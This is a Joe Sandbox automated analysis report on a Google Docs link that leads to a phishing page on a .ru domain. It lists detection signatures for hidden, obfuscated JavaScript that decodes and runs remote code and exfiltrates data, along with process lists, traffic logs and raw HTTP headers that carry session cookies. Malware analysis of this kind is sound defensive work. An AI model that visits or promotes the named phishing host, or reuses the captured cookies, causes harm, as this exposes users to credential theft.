Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?usp=sharing_eip&ts=67c8321f

Overview

General Information

Sample URL:https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?usp=sharing_eip&ts=67c8321f
Analysis ID:1630025
Infos:

Detection

HTMLPhisher, Invisible JS
Score:68
Range:0 - 100
Confidence:100%

Signatures

Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
AI detected suspicious Javascript
Detected non-DNS traffic on DNS port
HTML page contains hidden javascript code
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 2468 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2036,i,6415178722082897900,11855059784597257511,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 2360 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?usp=sharing_eip&ts=67c8321f" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_293JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    0.42.id.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
      0.42.id.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
        4.6.pages.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
          4.6.pages.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
            4.5.pages.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
              Click to see the 3 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: Yara matchFile source: dropped/chromecache_293, type: DROPPED
              Source: Yara matchFile source: 0.42.id.script.csv, type: HTML
              Source: Yara matchFile source: 4.6.pages.csv, type: HTML
              Source: Yara matchFile source: 4.7.pages.csv, type: HTML
              Source: Yara matchFile source: 4.5.pages.csv, type: HTML
              Source: Yara matchFile source: 0.42.id.script.csv, type: HTML
              Source: Yara matchFile source: 4.6.pages.csv, type: HTML
              Source: Yara matchFile source: 4.5.pages.csv, type: HTML
              Source: Yara matchFile source: 4.7.pages.csv, type: HTML
              Source: 0.41.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://2ya.leyapham.ru/zdvftqs/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob` and `decodeURIComponent` to decode and execute remote code is a clear indicator of malicious intent. Additionally, the script appears to be sending user data to an untrusted domain, which poses a significant risk of data theft or other malicious activities. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
              Source: 0.42.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://2ya.leyapham.ru/zdvftqs/... This script demonstrates high-risk behaviors, including dynamic code execution through the use of `eval()` and obfuscated code. The script appears to be attempting to conceal its true purpose, which is a strong indicator of malicious intent. Given the combination of these high-risk factors, this script should be considered a significant security threat and should not be executed.
              Source: https://2ya.leyapham.ru/zdvftqs/HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Graphic Card Web Template</title> <style> body { font-family: 'Montserrat', sa...
              Source: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0HTTP Parser: No favicon
              Source: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0HTTP Parser: No favicon
              Source: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0HTTP Parser: No favicon
              Source: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0HTTP Parser: No favicon
              Source: https://2ya.leyapham.ru/zdvftqs/#homeHTTP Parser: No favicon
              Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49756 version: TLS 1.0
              Source: Binary string: uTq.prototype.fb=function(){uTq.Uc.fb.call(this);this.R.dispose();this.F.dispose()};function wTq(a,c,e){e=e===void 0?!1:e;uTq.call(this,a,25);this.ma=e;this.va=!e;this.W=c}H(wTq,uTq);wTq.prototype.V=function(a,c,e){var f=0,g=a<this.W;a<c&&g?f=-Qpn(5,75,Dr((Math.min(this.W,c)-a)/25,0,1)):a>c+e&&!g&&(f=Qpn(5,75,Dr((a-Math.max(this.W,c+e))/25,0,1)));return f};function xTq(a,c,e,f,g){f=f||(c?zs(Cs(c)):zs());this.Zg=a;a=f.kd().body;var h=this.Zg.Ba();a.appendChild(h);mt(this.Zg.Ba(),!1);this.className=sbi();Deo.call(this,c,e,f);this.xa(this.Zg);this.AS(this.Zg.Ba());c=RAh(this.Zg.Ba(),.13);e=SAh(this.Zg.Ba(),.13);this.RK(c,e);this.H=new VBh(sbi(),!0);WBh(this.H,g!=null?g:1,void 0,void 0,-1);XBh(this.H,this.Zg.Ba(),this.Zg.D);this.H.I8a=!0;this.Pdb=300}Em(xTq,Deo);D=xTq.prototype;D.VHb=function(a,c,e,f){WBh(this.H,a,c,e,f)}; source: chromecache_248.2.dr
              Source: Binary string: D.NCb=function(a){var c;(c=this.D,c()).NCb(a)};D.UBb=function(a,c,e){var f;(f=this.D,f()).UBb(a,c,e)};D.aIa=function(a,c,e,f){var g;(g=this.D,g()).aIa(a,c,e,f)};D.nrb=function(a){var c;(c=this.D,c()).nrb(a)};D.pDb=function(a,c){var e;(e=this.D,e()).pDb(a,c)};D.Xeb=function(a,c){var e;(e=this.D,e()).Xeb(a,c)};D.In=function(){var a;return(a=this.D,a()).In()};D.Fo=function(){var a;return(a=this.D,a()).Fo()};D.ZL=function(){var a;return(a=this.D,a()).ZL()};D.xD=function(a){var c;return(c=this.D,c()).xD(a)}; source: chromecache_443.2.dr, chromecache_287.2.dr
              Source: Binary string: D.pDb=function(a,c){Bt(!Ou(a,c),"Oy");Bt(this.J,"Attempted to move a chapter in an unchaptered document.");eae(this,a);c=U$c(a,c);dae(this,c);var e=this.D.get(a).getId();this.D.move(a,c);R$d(this.F,this.F.V,e)}; source: chromecache_443.2.dr, chromecache_287.2.dr
              Source: Binary string: D.getName=function(a,c){a=myh(a,0).toString(16);this.H.has(a)?(a=this.H.get(a),c(a)):(this.D.isActive()&&this.D.abort(),this.J&&BI(this.J),c=Bm(this.Cyc,this,a,c),this.J=yI(this.D,Md,c),xeo(this,"c",a,this.D))};D.Cyc=function(a,c){yeo(this,this.D);a=this.H.has(a)?this.H.get(a):null;c(a)};function yeo(a,c){if(c.Bu()){c=c.o_();for(var e in c)c[e].hasOwnProperty(dQ)&&a.H.set(e,c[e].name)}}function xeo(a,c,e,f){a=new OF(a.R);FR(a,c,e);FR(a,"p",dQ);f.send(a)};function zeo(a){this.data=new veo;this.F=a;this.D=new teo}var Aeo;function Beo(a){Aeo||(Aeo=new zeo(a||new weo("//i18n-cloud.appspot.com/cproperties")));return Aeo};function Ceo(a,c){this.gj=a instanceof Gr?a:new Gr(a,c)}Em(Ceo,gbh);Ceo.prototype.xd=function(a,c,e,f){xS(Pyb(a),0,a,c,this.gj,e,null,f)};function Deo(a,c,e){this.ee=e||(a?zs(Cs(a)):zs());$Bh.call(this,this.ee.Na(ab,{style:"position:absolute;display:none;"}));this.Lp=new Gr(1,1);this.F=new Set;this.J=null;a&&this.attach(a);c!=null&&this.KFa(c)}Em(Deo,$Bh);var Eeo=[];D=Deo.prototype;D.pF=null;D.className="goog-tooltip";D.Pdb=500;D.Myb=0;D.Ma=x("ee");D.attach=function(a){a=Cs(a);this.F.add(a);xI(a,ej,this.lw,!1,this);xI(a,dj,this.Jya,!1,this);xI(a,cj,this.yta,!1,this);xI(a,lh,this.Ol,!1,this);xI(a,Rc,this.Jya,!1,this)}; source: chromecache_248.2.dr
              Source: Binary string: function Ass(a,c){c=P5(c)&&Dq(N5(c),asn,27,y1);if(!c)return a.D.Fc(Error("rea")),!1;if(!Wp(c,Zrn,2,$rn))return a.D.Fc(Error("Fea")),!1;c=c.getResponse();if(!Zq(c,1))return a.D.Fc(Error("Gea")),!1;switch(rq(c,2)){case 0:return a.D.Fc(Error("Hea")),!1;case 1:if($q(c,3))return a.D.Fc(Error("Iea")),!1;break;case 2:if(!$q(c,3)||rq(c,3)===0)return a.D.Fc(Error("Jea")),!1}return!0};function Lss(){bV.apply(this,arguments)}H(Lss,bV);Lss.prototype.Xd=B("app-switcher-menu");Lss.Bb=function(){return NF(Lss)};function Mss(a,c,e,f,g){a=a===void 0?!1:a;c=c===void 0?!0:c;f=f===void 0?null:f;Deo.call(this,e,f,g);this.Aa=a;this.H=c;this.wa=f;this.className="companion-tooltip";aCh(this,this.Aa?this.H?3:13:this.H?2:12);this.Myb=this.Pdb=150;eBh(this,!0)}H(Mss,Deo);Mss.prototype.Rpa=function(){if(!Deo.prototype.Rpa.call(this))return!1;var a=this.dn();if(!a)return!1;var c=this.wa||pT(a);a=Myh(a,Ue);if(!c||a==zl)return!1;this.KFa(c);return!0}; source: chromecache_248.2.dr
              Source: Binary string: new yE),xE(a,vua,new yE),xE(a,Vxa,new yE),xE(a,BIa,new yE),xE(a,ug,new yE),uOc(a,C),xE(a,Qf,new yE));return a};function I2e(){this.F=new cNd;this.D={};Xu(this.D,"nm",Qf)}H(I2e,K);I2e.prototype.getType=function(a){var c=a.ty;return c in this.D?this.D[c]:this.F.getType(a)};function J2e(){}H(J2e,K);J2e.prototype.apply=function(a,c){c.UBb(a.Bf(),a.F,a.getPath());return!1};J2e.prototype.lI=B(null);function K2e(){}H(K2e,K);K2e.prototype.apply=function(a,c){c.nrb(a.getPath());return!1};K2e.prototype.lI=B(null);function L2e(a){this.R=N_a;qt(xPb(a,(gF(),aWc)));H$d.validate(a);this.F=a}H(L2e,Fx);function M2e(){}H(M2e,K);M2e.prototype.apply=function(a,c){c.NCb(a.F);var e=c.p4();a=AUe(e);a!=null&&(zUe(e,null),rt(c.In(),"dF"),e=hF(),e=a==null?e.remove((NI(),iae)):e.update((NI(),iae),a),c.iY((NI(),jae).apply(c.Jc(),e.oa())));return!1};M2e.prototype.lI=B(null);function N2e(a,c){this.R=U_a;rt(!Ou(a,c),"mG");this.F=M$d(a);this.O=M$d(c)}H(N2e,Fx);N2e.prototype.oC=G(854);N2e.prototype.d$=G(857);N2e.prototype.pWa=!0;function O2e(){}H(O2e,K);O2e.prototype.apply=function(a,c){c.pDb(a.F,a.O);return!1};O2e.prototype.lI=B(null);function P2e(a,c){this.D=a;this.F=c}H(P2e,K);P2e.prototype.apply=function(a,c){if(u$d(a))return this.F.apply(a,c);qt(Go(a.getType(),Qf));return this.D.apply(a,c)};P2e.prototype.lI=function(a,c,e){if(u$d(a))return this.F.lI(a,c,e);qt(Go(a.getType(),Qf));return this.D.lI(a,c,e)};function Q2e(a){this.D=a}H(Q2e,K);Q2e.prototype.apply=function(a,c){return this.D.apply(a.F,c.p4())};Q2e.prototype.lI=function(a,c,e){return(a=this.D.lI(a.F,c.p4(),e))?new fPc(a,new II("")):null};function R2e(a,c){this.R=m1a;this.O=a;rt(RVc(c,(gF(),H$d).D),"nG");rt(!$Vc(c),"oG");H$d.validate(c.D);this.F=c}H(R2e,Fx);R2e.prototype.Bf=x("O");function S2e(){}H(S2e,K);S2e.prototype.apply=function(a,c){var e=a.Bf(),f=c.WT(e).Jc();a=(gF(),J$d).apply(f,a.F);if(f.Ua(a))return!0;c.Xeb(e,a);return!1};S2e.prototype.lI=B(null);function T2e(a){this.R=n1a;rt(RVc(a,(NI(),cae).D),"pG");cae.validate(a.D);this.F=a}H(T2e,Fx);function U2e(){}H(U2e,K);U2e.prototype.apply=function(a,c){var e=c.Jc();a=(NI(),jae).apply(e,a.F);if(e.Ua(a))return!0;c.iY(a);return!1};U2e.prototype.lI=B(null);function V2e(a,c,e){mOc(a);uE(a,XPa,new HPc);uE(a,yGa,new oPc);uE(a,vua,new cOc);uE(a,Vxa,new JOc);uE(a,BIa,new xPc);uE(a,ug,new LPc);oWc(new EKd).forEach(function(h,k){uE(a,h,k)});uE(a,N_a,new M2e);uE(a,n1a,new U2e);uE(a,GYa,new J2e);uE(a,RZa,new K2e);uE(a,U_a,new O2e);uE(a,m1a,new S2e);c=new Q2e(c);var f=Oy((kce(),lce),{"docs-nestedModel":!0}),g;for(g in f)uE(a,g,c);e=new P2e(ePc(e,Qbe()),c);uE(a,Qf,e)};function W2e(){this.D=0}H(W2e,Im);function X2e(a,c){var e=new W2e;e.H=a;e.D=c;return e}var Y2e=X2e("APPLIER",0),Z2e=X2e("INVERTER",1),$2e=X2e("SERIALIZER",2),a3e=X2e("COMPACTOR",3);function b3e(){}H(b3e,K);function c3e(a){var c=new b3e;c.D=ou(nBb());c.H=a;return c}function d3e(a,c){a.F=c;return a}function e3e(a){Dt(a.F);nu(a.D,Y2e);return a}function f3e(a,c,e){Dt(a.F);a.J=c;a.R=e;nu(a.D,Z2e);return a}function g3e(a
              Source: Binary string: D.Jya=function(a){var c=Ieo(this,a.target),e=Ieo(this,a.relatedTarget);c!=e&&(c==this.pF&&(this.pF=null),Geo(this),this.Ca=!1,!this.isVisible()||a.relatedTarget&&Os(this.Ba(),a.relatedTarget)?this.anchor=void 0:this.VUa())};D.oyb=function(){var a=this.Ba();this.pF!=a&&(this.Sla(),this.pF=a)};D.J8b=function(a){var c=this.Ba();this.pF!=c||a.relatedTarget&&Os(c,a.relatedTarget)||(this.pF=null,this.VUa())};function Jeo(a,c,e){a.O||(a.O=EI(Bm(a.ujb,a,c,e),a.Pdb))} source: chromecache_248.2.dr
              Source: global trafficTCP traffic: 192.168.2.5:62888 -> 162.159.36.2:53
              Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49756 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?usp=sharing_eip&ts=67c8321f HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /static/document/client/css/3155988811-KixCss_ltr.css HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?usp=sharing_eip&ts=67c8321fAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=ewGe8FTUIcMmxKRLAZj-NK7Af2_Hju05pkmf4oUs20yDDw4jmj0rlQDj0xnuPimJCpzoBFSg6CI1DBAtWmQZWwG6x2v9571QVxc0Hej3RuxEtow0BxhMM6sKK_FpS7zCeZW6uuwHvKaP0Llq6NsLBhWOxQx-bERWXkf-VZYX12I8dWpXrpwsPqZlaIdJrAhz; GFE_RTT=321
              Source: global trafficHTTP traffic detected: GET /static/document/client/js/2127550289-client_js_prod_kix_core.js HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?usp=sharing_eip&ts=67c8321fAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=ewGe8FTUIcMmxKRLAZj-NK7Af2_Hju05pkmf4oUs20yDDw4jmj0rlQDj0xnuPimJCpzoBFSg6CI1DBAtWmQZWwG6x2v9571QVxc0Hej3RuxEtow0BxhMM6sKK_FpS7zCeZW6uuwHvKaP0Llq6NsLBhWOxQx-bERWXkf-VZYX12I8dWpXrpwsPqZlaIdJrAhz; GFE_RTT=321
              Source: global trafficHTTP traffic detected: GET /static/document/client/js/3256724347-client_js_prod_kix_nestedsketchycore.js HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?usp=sharing_eip&ts=67c8321fAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=ewGe8FTUIcMmxKRLAZj-NK7Af2_Hju05pkmf4oUs20yDDw4jmj0rlQDj0xnuPimJCpzoBFSg6CI1DBAtWmQZWwG6x2v9571QVxc0Hej3RuxEtow0BxhMM6sKK_FpS7zCeZW6uuwHvKaP0Llq6NsLBhWOxQx-bERWXkf-VZYX12I8dWpXrpwsPqZlaIdJrAhz; GFE_RTT=321
              Source: global trafficHTTP traffic detected: GET /static/document/client/js/3866954191-client_js_prod_kix_app.js HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?usp=sharing_eip&ts=67c8321fAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=ewGe8FTUIcMmxKRLAZj-NK7Af2_Hju05pkmf4oUs20yDDw4jmj0rlQDj0xnuPimJCpzoBFSg6CI1DBAtWmQZWwG6x2v9571QVxc0Hej3RuxEtow0BxhMM6sKK_FpS7zCeZW6uuwHvKaP0Llq6NsLBhWOxQx-bERWXkf-VZYX12I8dWpXrpwsPqZlaIdJrAhz; GFE_RTT=321
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://docs.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=ewGe8FTUIcMmxKRLAZj-NK7Af2_Hju05pkmf4oUs20yDDw4jmj0rlQDj0xnuPimJCpzoBFSg6CI1DBAtWmQZWwG6x2v9571QVxc0Hej3RuxEtow0BxhMM6sKK_FpS7zCeZW6uuwHvKaP0Llq6NsLBhWOxQx-bERWXkf-VZYX12I8dWpXrpwsPqZlaIdJrAhz
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=ewGe8FTUIcMmxKRLAZj-NK7Af2_Hju05pkmf4oUs20yDDw4jmj0rlQDj0xnuPimJCpzoBFSg6CI1DBAtWmQZWwG6x2v9571QVxc0Hej3RuxEtow0BxhMM6sKK_FpS7zCeZW6uuwHvKaP0Llq6NsLBhWOxQx-bERWXkf-VZYX12I8dWpXrpwsPqZlaIdJrAhz
